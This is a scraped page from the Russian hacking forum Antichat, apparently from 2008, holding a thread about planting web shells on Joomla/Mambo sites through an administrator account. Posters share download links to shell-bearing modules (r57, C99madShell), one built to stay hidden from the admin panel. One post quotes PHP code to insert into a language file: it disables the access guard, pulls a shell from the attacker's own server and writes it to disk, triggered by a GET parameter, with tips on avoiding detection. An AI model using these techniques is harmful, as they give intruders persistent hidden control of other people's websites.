ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 12.02.2008, 23:48
je0n
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521

Репутация: 272
Отправить сообщение для je0n с помощью ICQ
По умолчанию

Цитата:
Сообщение от chekist  
архивчик http://slil.ru/25282464
это мой модуль шелл устанавливать как обычный модуль
http://localhost/joomla/administrator/index2.php?option=com_installer&element=module
шелл будет тут
http://localhost/joomla/modules/mod_j_news.php?module=joomla
не получается
XML setup file is not for a "component"
я не супер-админ, просто админ. к language manager доступа нет. что еще замутить?
 
Ответить с цитированием

  #12  
Старый 15.02.2008, 10:02
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

Цитата:
Сообщение от je0n  
не получается
XML setup file is not for a "component"
я не супер-админ, просто админ. к language manager доступа нет. что еще замутить?
ты весь архив загружал ?
>>XML setup file is not for a "component" ты пытался установить компонент а не модуль, тебе сюда administrator/index2.php?option=com_installer&element=module
1) mod_r.zip не распаковывай так и отправляй, для установки модуля на запись должны бать доступны паки media, administrator/modules, modules
2) установи компонент com_joomlaxplorer(http://slil.ru/25475840) это файловый менеджер, для установки компонента должны быть доступны на запись папки media, administrator/components, components, images/stories

в двишках жомла или мамбо чтобы установить компонент или модуль они должны быть в архиве обычно zip в котором должен быть xml файл в котором и расписана вся установка

ЗЫ. если не получится залить шелл пишы в личку

Последний раз редактировалось chekist; 15.02.2008 в 10:19..
 
Ответить с цитированием

  #13  
Старый 16.02.2008, 06:12
Хозяин
Постоянный
Регистрация: 15.03.2006
Сообщений: 600
Провел на форуме:
5091304

Репутация: 1203


По умолчанию

chekist, ты походу сам не понимаешь что выкладываешь и о чем говоришь ...
это именно МОДУЛЬ, и устанавливать его как модуль нужно! и тогда все работает. Шелл там кстати r57.

вот еще один вариант, как по мне так получше будет.

- устанавливается как компонент
- внутри C99madShell
- доступен по адресу /components/com_articles/articles.php
[COLOR=White-[/COLOR] с админки его не видно, соответственно НЕ удаляется

http://rapidshare.com/files/92224104/com_articles.zip.html

тут я чуть переделал все это дело, скрестил как говорится, для меньшей палевности )))

все то же самое, только доступен по адресу:
/components/com_articles/articles.php?module=joomla

так:
/components/com_articles/articles.php
он не заведется

Последний раз редактировалось AciD_FreaK; 16.02.2008 в 06:44..
 
Ответить с цитированием

  #14  
Старый 02.03.2008, 19:45
chekist
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854

Репутация: 622
По умолчанию

AciD_FreaK
>>это именно МОДУЛЬ, и устанавливать его как модуль нужно! и тогда все работает. Шелл там кстати r57.
а я что написал, я выкладывал модуль и устанавливать его надо как модуль, находились умники которые не знали как его устанавливать увидив архив они начинали его распаковывать

и чем тебе не нравится r57?
 
Ответить с цитированием

  #15  
Старый 24.08.2008, 16:58
remb0
Участник форума
Регистрация: 22.04.2007
Сообщений: 128
Провел на форуме:
802306

Репутация: 51
Отправить сообщение для remb0 с помощью ICQ
По умолчанию

народ!!! можно ли както подругому залить шел через админкуджомлы ?! А то когда пробуеш через редактирование языка или установки модуля требует Логин и Пароль к Ftp!!!
 
Ответить с цитированием

  #16  
Старый 24.08.2008, 17:22
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

__https://forum.antichat.ru/showpost.php?p=593795&postcount=14
 
Ответить с цитированием

  #17  
Старый 24.08.2008, 18:54
remb0
Участник форума
Регистрация: 22.04.2007
Сообщений: 128
Провел на форуме:
802306

Репутация: 51
Отправить сообщение для remb0 с помощью ICQ
По умолчанию

Цитата:
Сообщение от ~!DoK_tOR!~  
__https://forum.antichat.ru/showpost.php?p=593795&postcount=14
сенкс , но проблема в этом


Последний раз редактировалось remb0; 24.08.2008 в 18:57..
 
Ответить с цитированием

  #18  
Старый 26.08.2008, 02:12
Nek1t
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538

Репутация: 23
По умолчанию

Все просто. Ты льешь старую компоненту в новую Joomla 1.5 . Лучше заливай шелл через шаблон.

В крайнем случае можешь включить плагин для поддержки старых компонентов.

если не понял - стукни в ПМ, со скринами объясню

Последний раз редактировалось Nek1t; 26.08.2008 в 02:20..
 
Ответить с цитированием

  #19  
Старый 08.09.2008, 22:04
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715

Репутация: 659


Отправить сообщение для diehard с помощью ICQ
По умолчанию

Цитата:
Сообщение от Grey  
Вот тебе способ (как раз сегодня так шелл залил + только что на локалке проверил еще разок (на новой версии)):

заходишь в админку Language Manager выбираешь файл который будешь редактировать, к примеру English, щелка по нему попадаешь в менюшку с редактированием в ней есть путь до файла, к примеру:

z:/home/test1.ru/www/language/english.php

он тебе пригодится, точнее его часть, теперь сам файл, там может быть защита от выполнения без инклуда (если защиты нет то просто дописываем пару строчек):

PHP код:
// no direct access
defined'_VALID_MOS' ) or die( 'Restricted access' ); 
Экранируем эту строчку и дописываем подарок:

PHP код:
if($HTTP_GET_VARS['a']==1

$file file('http://адрес твоего сайта с шеллом/shell.txt'); 
$file2 fopen("shell.php""w"); // здесь shell.php имя твоего шелла - который будет создан в результате работы скрипта
for ($i 0$i count($file); $i++) 

fputs($file2$file[$i]); 

fclose($file2); 


// no direct access
//defined( '_VALID_MOS' ) or die( 'Restricted access' ); 
Дальше переходим по линке:

http://test1.ru/language/english.php?a=1

И получаем шелл:

http://test1.ru/language/shell.php

P.S. можно конечно впихнуть шелл и в редактируемый файл - но палевно будет смотреться, а так залил шелл, вернул все обратно и все гуд.
Я не понимаю с чем связано, но запуская шелл постоянно получаю ошибку 500 Internal Server Error, поэтому загружаю шелл прямо в english.php, который вызывается с определенными параметрами в GET-запросе:

if ($_GET['xek']=='ontechad'){
// r57
}

www.site.com/language/english.php?xek=ontechad
 
Ответить с цитированием

  #20  
Старый 10.09.2008, 16:55
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031

Репутация: 184
По умолчанию

Цитата:
Сообщение от AciD_FreaK  
вот еще один вариант, как по мне так получше будет.

- устанавливается как компонент
- внутри C99madShell
- доступен по адресу /components/com_articles/articles.php
[COLOR=White-[/COLOR] с админки его не видно, соответственно НЕ удаляется

http://rapidshare.com/files/92224104/com_articles.zip.html

тут я чуть переделал все это дело, скрестил как говорится, для меньшей палевности )))

все то же самое, только доступен по адресу:
/components/com_articles/articles.php?module=joomla

так:
/components/com_articles/articles.php
он не заведется
А как его удалить? Там есть кнопка self destruct, но мне кажется удалится только пхп-шелл, а папка /components/com_articles останется. Как бы удалить и ее, и ее содержимое?

Желательно без заливки еще одного шелла.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливка шелла в Ipb 2.0.* GreenBear Форумы 28 30.04.2009 11:06
Заливка шелла на phpBB 2.0.6 через highlights ded2006 Форумы 22 12.01.2006 07:29
Заливка шелла на IPB Lord Nikon Форумы 22 08.01.2006 01:05
Заливка шелла на PHP-Fusion. ilyha Форумы 11 09.12.2005 20:52
Заливка шелла и снятие бана в ipb через mysql darks Форумы 14 26.11.2005 00:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ